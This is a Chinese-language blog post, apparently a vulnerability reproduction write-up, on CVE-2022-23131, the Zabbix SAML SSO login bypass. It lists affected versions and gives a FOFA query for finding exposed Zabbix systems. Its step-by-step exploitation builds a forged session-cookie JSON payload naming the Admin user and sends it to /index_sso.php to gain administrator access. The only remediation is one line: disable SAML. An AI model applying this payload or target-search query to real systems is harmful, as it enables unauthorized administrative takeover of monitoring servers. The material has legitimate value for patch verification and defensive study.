zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)

一、漏洞详情


        在启用SAML SSO身份验证(非默认)的情况下,会话数据可能被恶意参与者修改,因为没有验证存储在会话中的用户登录。未经身份验证的恶意行为者可能利用此问题升级特权并获得对Zabbix Frontend的管理访问权。要执行攻击,需要启用SAML身份验证,参与者必须知道Zabbix用户的用户名(或使用guest帐户,默认情况下该帐户是禁用的)。


二、漏洞版本

4.0.36
5.4.0
5.4.8
6.0.0alpha1


三、环境搭建


fofa:app="ZABBIX-监控系统" && body="SAML"


四、漏洞复现


1、访问,获取cookie


2、base64解码


3、构造payload,需要已知Zabbix用户的用户名,这里我们默认用户名为Admin
 

{
"saml_data": {
"username_attribute": "Admin"
},
"sessionid": "c8ebc80cb2535327c66fd5f6021d0902",
"sign": "\/p+dShTP31SMr+Em5MIWEnp9iBDAxC3oT0Z5EvH76R2R5uBgzjyGBYAG4HmjB5fTcX8Kzjnh7CTe7panObWGVw=="
}


4、base64加密payload,然后构造cookie,访问/index_sso.php,返回值Location存在:action=dashboard.view


5、手动替换网页的cookie,刷新可按照Admin用户权限访问


五、修复建议

禁用 SAML 身份验证

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值